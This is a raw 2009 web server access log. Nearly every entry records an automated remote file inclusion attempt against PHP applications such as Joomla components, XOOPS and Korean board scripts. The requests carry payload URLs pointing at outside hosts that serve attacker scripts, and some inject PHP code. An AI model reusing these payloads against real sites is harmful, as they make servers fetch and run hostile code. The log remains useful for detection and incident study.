61.63.90.81 - - [11/Mar/2009:06:33:20 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
61.63.90.81 - - [11/Mar/2009:06:33:20 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
61.63.90.81 - - [11/Mar/2009:06:33:59 -0500] "GET /logs/access_log.1228608000%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
12.53.219.68 - - [11/Mar/2009:06:39:03 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rubik.co.za/rss/osid6.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
12.53.219.68 - - [11/Mar/2009:06:39:03 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rubik.co.za/rss/osid6.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
69.65.122.96 - - [11/Mar/2009:06:56:32 -0500] "GET /logs//include/write.php?dir=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:06:56:32 -0500] "GET //include/write.php?dir=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
74.52.100.226 - - [11/Mar/2009:06:59:02 -0500] "GET //include/write.php?dir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
74.52.100.226 - - [11/Mar/2009:06:59:02 -0500] "GET /logs//include/write.php?dir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:07:00:16 -0500] "GET /logs//shop/main.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:07:00:16 -0500] "GET //shop/main.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:07:00:17 -0500] "GET /logs//who/shop/main.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:07:00:23 -0500] "GET //who/shop/main.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
72.3.245.132 - - [11/Mar/2009:07:04:14 -0500] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
72.3.245.132 - - [11/Mar/2009:07:04:15 -0500] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.3.245.132 - - [11/Mar/2009:07:04:15 -0500] "GET /logs/access_log.1231027200/vwar/convert/mvcw.php?step=1&vwar_root=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
74.52.100.226 - - [11/Mar/2009:07:06:14 -0500] "GET /logs//who/shop/main.php?_shop_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
74.52.100.226 - - [11/Mar/2009:07:06:14 -0500] "GET //who/shop/main.php?_shop_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
74.52.100.226 - - [11/Mar/2009:07:06:45 -0500] "GET /logs//shop/main.php?_shop_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
74.52.100.226 - - [11/Mar/2009:07:06:45 -0500] "GET //shop/main.php?_shop_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:07:11:18 -0500] "GET /logs//main.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:07:11:18 -0500] "GET //main.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:07:11:22 -0500] "GET //main.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Tntid.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.810"
61.62.162.42 - - [11/Mar/2009:07:11:24 -0500] "GET /logs//apboard/portal.php/add.php?APB_rp=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:07:11:24 -0500] "GET /logs//apboard/portal.php/add.php?APB_rp=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:07:11:25 -0500] "GET //apboard/portal.php/add.php?APB_rp=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:07:11:25 -0500] "GET //apboard/portal.php/add.php?APB_rp=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
69.65.122.96 - - [11/Mar/2009:07:11:27 -0500] "GET /logs//main.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Tntid.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
124.217.242.70 - - [11/Mar/2009:07:20:17 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://kashikicks.ru/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.812"
124.217.242.70 - - [11/Mar/2009:07:20:18 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://kashikicks.ru/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
65.55.208.134 - - [11/Mar/2009:07:21:19 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [11/Mar/2009:07:21:19 -0500] "GET /logs/access_log.1197244800 HTTP/1.1" 200 2976 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
122.201.73.62 - - [11/Mar/2009:07:21:46 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.adaiwa.com/car/images/uploads/11013001??? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
122.201.73.62 - - [11/Mar/2009:07:21:46 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.adaiwa.com/car/images/uploads/11013001??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
222.237.76.50 - - [11/Mar/2009:07:24:06 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.237.76.50 - - [11/Mar/2009:07:24:06 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.237.76.50 - - [11/Mar/2009:07:24:06 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.226.88.17 - - [11/Mar/2009:07:28:13 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:07:28:13 -0500] "GET /logs/errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:07:28:13 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:07:28:13 -0500] "GET /errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
77.91.201.31 - - [11/Mar/2009:07:31:30 -0500] "GET ////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.823"
77.91.201.31 - - [11/Mar/2009:07:31:30 -0500] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.823"
202.71.213.10 - - [11/Mar/2009:07:32:47 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://kashikicks.ru/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
202.71.213.10 - - [11/Mar/2009:07:32:47 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://kashikicks.ru/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
139.179.10.6 - - [11/Mar/2009:07:36:17 -0500] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
139.179.10.6 - - [11/Mar/2009:07:36:17 -0500] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
69.65.122.96 - - [11/Mar/2009:07:38:59 -0500] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:07:38:59 -0500] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
202.53.250.24 - - [11/Mar/2009:07:40:24 -0500] "GET ////?custompluginfile%5B%5D=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 200 3247 "-""libwww-perl/5.805"
202.53.250.24 - - [11/Mar/2009:07:40:35 -0500] "GET /logs////?custompluginfile%5B%5D=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 200 36689 "-""libwww-perl/5.805"
202.59.205.160 - - [11/Mar/2009:07:42:24 -0500] "GET ////?custompluginfile%5B%5D=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 200 3247 "-""libwww-perl/5.812"
202.59.205.160 - - [11/Mar/2009:07:42:43 -0500] "GET /logs////?custompluginfile%5B%5D=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 200 36689 "-""libwww-perl/5.812"
78.40.226.135 - - [11/Mar/2009:07:48:22 -0500] "GET /logs////?custompluginfile%5B%5D=VuLneRaBillTy? HTTP/1.1" 200 181182 "-""libwww-perl/5.79"
78.40.226.135 - - [11/Mar/2009:07:48:26 -0500] "GET ////?custompluginfile%5B%5D=VuLneRaBillTy? HTTP/1.1" 200 3247 "-""libwww-perl/5.79"
78.40.226.135 - - [11/Mar/2009:07:49:49 -0500] "GET ////?custompluginfile%5B%5D=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 200 3247 "-""libwww-perl/5.79"
122.201.73.62 - - [11/Mar/2009:07:49:53 -0500] "GET //appserv/main.php?appserv_root=http://www.adaiwa.com/car/images/uploads/11013001??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
122.201.73.62 - - [11/Mar/2009:07:49:53 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.adaiwa.com/car/images/uploads/11013001??? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
78.40.226.135 - - [11/Mar/2009:07:50:01 -0500] "GET /logs////?custompluginfile%5B%5D=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 200 181182 "-""libwww-perl/5.79"
78.40.226.135 - - [11/Mar/2009:07:50:49 -0500] "GET /logs////?custompluginfile%5B%5D=VuLneRaBillTy? HTTP/1.1" 200 181182 "-""libwww-perl/5.79"
78.40.226.135 - - [11/Mar/2009:07:50:53 -0500] "GET ////?custompluginfile%5B%5D=VuLneRaBillTy? HTTP/1.1" 200 3247 "-""libwww-perl/5.79"
122.201.73.62 - - [11/Mar/2009:07:52:27 -0500] "GET //appserv/main.php?appserv_root=http://www.adaiwa.com/car/images/uploads/11013001??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
122.201.73.62 - - [11/Mar/2009:07:52:27 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.adaiwa.com/car/images/uploads/11013001??? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
89.108.67.172 - - [11/Mar/2009:07:59:15 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.blix.cc/language/idd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
89.108.67.172 - - [11/Mar/2009:07:59:15 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.blix.cc/language/idd.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
77.221.130.9 - - [11/Mar/2009:08:00:21 -0500] "GET /logs/access_log.1232064000/?shop_this_skin_path=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.9 - - [11/Mar/2009:08:00:21 -0500] "GET /?shop_this_skin_path=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
65.55.230.166 - - [11/Mar/2009:08:00:22 -0500] "GET /logs/access_log.1174435200 HTTP/1.1" 200 1320 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
77.221.130.9 - - [11/Mar/2009:08:00:23 -0500] "GET /logs/access_log.1232064000/?shop_this_skin_path=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.9 - - [11/Mar/2009:08:00:23 -0500] "GET /?shop_this_skin_path=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.221.130.9 - - [11/Mar/2009:08:00:23 -0500] "GET /logs/?shop_this_skin_path=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 200 181175 "-""Mozilla/5.0"
77.221.130.9 - - [11/Mar/2009:08:00:25 -0500] "GET /logs/?shop_this_skin_path=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 200 181175 "-""Mozilla/5.0"
77.221.130.9 - - [11/Mar/2009:08:00:25 -0500] "GET /logs/access_log.1232755200/?shop_this_skin_path=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.9 - - [11/Mar/2009:08:00:28 -0500] "GET /logs/access_log.1232755200/?shop_this_skin_path=http://face-pros.com/wuian/bbs/data/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.226.88.17 - - [11/Mar/2009:08:03:38 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:08:03:38 -0500] "GET /logs/errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:08:03:38 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:08:03:38 -0500] "GET /errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
69.65.122.96 - - [11/Mar/2009:08:04:49 -0500] "GET //poll/booth.php?include_path=http://vis1.uuuq.com/nat.jpg??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
69.65.122.96 - - [11/Mar/2009:08:21:55 -0500] "GET /logs//admin/index.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:08:21:55 -0500] "GET //admin/index.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
202.59.205.160 - - [11/Mar/2009:08:22:04 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
75.125.182.74 - - [11/Mar/2009:08:22:21 -0500] "GET //apboard/thread.php/add.php?APB_rp=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
75.125.182.74 - - [11/Mar/2009:08:22:21 -0500] "GET /logs/access_log.1230595200//apboard/thread.php/add.php?APB_rp=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
75.125.182.74 - - [11/Mar/2009:08:22:21 -0500] "GET /logs//apboard/thread.php/add.php?APB_rp=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:08:22:34 -0500] "GET //admin/index.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Tntid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:08:22:34 -0500] "GET /logs//admin/index.php?_shop_path=http://nachwuchs.fcc-supporters.de/images/Tntid.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
202.59.205.160 - - [11/Mar/2009:08:22:36 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
75.125.182.74 - - [11/Mar/2009:08:22:40 -0500] "GET /logs/access_log.1232236800//apboard/thread.php/add.php?APB_rp=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
202.59.205.160 - - [11/Mar/2009:08:22:40 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
202.59.205.160 - - [11/Mar/2009:08:22:40 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
202.59.205.160 - - [11/Mar/2009:08:23:01 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
202.59.205.160 - - [11/Mar/2009:08:23:01 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
200.201.183.18 - - [11/Mar/2009:08:23:20 -0500] "GET /logs//apboard/thread.php/add.php?APB_rp=http://www.amen-amen.net/echadlared//flash/v6id.txt?????? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
200.201.183.18 - - [11/Mar/2009:08:23:20 -0500] "GET //apboard/thread.php/add.php?APB_rp=http://www.amen-amen.net/echadlared//flash/v6id.txt?????? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
78.40.226.135 - - [11/Mar/2009:08:23:44 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=VuLneRaBillTy? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
78.40.226.135 - - [11/Mar/2009:08:23:46 -0500] "GET //skin/zero_vote/ask_password.php?dir=VuLneRaBillTy? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
65.55.208.139 - - [11/Mar/2009:08:24:03 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [11/Mar/2009:08:24:03 -0500] "GET /?N=D HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.52.100.226 - - [11/Mar/2009:08:24:13 -0500] "GET /logs//admin/index.php?_shop_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
74.52.100.226 - - [11/Mar/2009:08:24:14 -0500] "GET //admin/index.php?_shop_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
85.214.90.3 - - [11/Mar/2009:08:25:07 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
85.214.90.3 - - [11/Mar/2009:08:25:07 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
64.202.102.41 - - [11/Mar/2009:08:25:28 -0500] "GET //apboard/thread.php/add.php?APB_rp=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
64.202.102.41 - - [11/Mar/2009:08:25:28 -0500] "GET /logs/access_log.1230595200//apboard/thread.php/add.php?APB_rp=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
64.202.102.41 - - [11/Mar/2009:08:25:28 -0500] "GET /logs//apboard/thread.php/add.php?APB_rp=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
64.202.102.41 - - [11/Mar/2009:08:25:33 -0500] "GET /logs/access_log.1232236800//apboard/thread.php/add.php?APB_rp=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.55.208.121 - - [11/Mar/2009:08:26:59 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [11/Mar/2009:08:27:00 -0500] "GET /?M=A HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
69.64.34.249 - - [11/Mar/2009:08:29:38 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
69.64.34.249 - - [11/Mar/2009:08:29:39 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
61.63.90.81 - - [11/Mar/2009:08:36:54 -0500] "GET //joomla%A7Path/com%A7directory/modules/mod%A7pxt%A7latest.php?GLOBALS%C4mosConfig%A7absolute%A7path%D1=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
61.63.90.81 - - [11/Mar/2009:08:36:54 -0500] "GET /logs//joomla%A7Path/com%A7directory/modules/mod%A7pxt%A7latest.php?GLOBALS%C4mosConfig%A7absolute%A7path%D1=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
78.40.226.135 - - [11/Mar/2009:08:40:27 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
77.91.201.31 - - [11/Mar/2009:08:40:36 -0500] "GET //?GOODS[no]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.823"
77.91.201.31 - - [11/Mar/2009:08:40:36 -0500] "GET /logs//?GOODS[no]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 181180 "-""libwww-perl/5.823"
78.40.226.135 - - [11/Mar/2009:08:40:40 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://roadone.net//board//data/photo/db/z6id.txt??%0D?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
62.44.70.253 - - [11/Mar/2009:08:44:06 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:08:44:06 -0500] "GET //modules/xfsection/modify.php?dir_module=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:08:44:32 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:08:44:32 -0500] "GET //modules/xfsection/modify.php?dir_module=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
69.65.122.96 - - [11/Mar/2009:08:47:05 -0500] "GET /logs//index.php?APB_rp=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:08:47:05 -0500] "GET //index.php?APB_rp=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.108.67.172 - - [11/Mar/2009:08:47:49 -0500] "GET /logs//?GOODS[no]=http://www.blix.cc/language/idd.txt?? HTTP/1.1" 200 181180 "-""libwww-perl/5.812"
89.108.67.172 - - [11/Mar/2009:08:47:50 -0500] "GET //?GOODS[no]=http://www.blix.cc/language/idd.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.812"
207.226.88.17 - - [11/Mar/2009:08:47:59 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.inflightservice.se/images/left.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:08:47:59 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.inflightservice.se/images/left.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
65.254.51.178 - - [11/Mar/2009:08:48:53 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.814"
65.254.51.178 - - [11/Mar/2009:08:48:53 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.814"
66.179.175.12 - - [11/Mar/2009:08:49:56 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
66.179.175.12 - - [11/Mar/2009:08:49:56 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
66.179.175.12 - - [11/Mar/2009:08:50:01 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
66.179.175.12 - - [11/Mar/2009:08:50:02 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
62.44.70.253 - - [11/Mar/2009:09:06:13 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:09:06:13 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:09:06:15 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:09:06:15 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
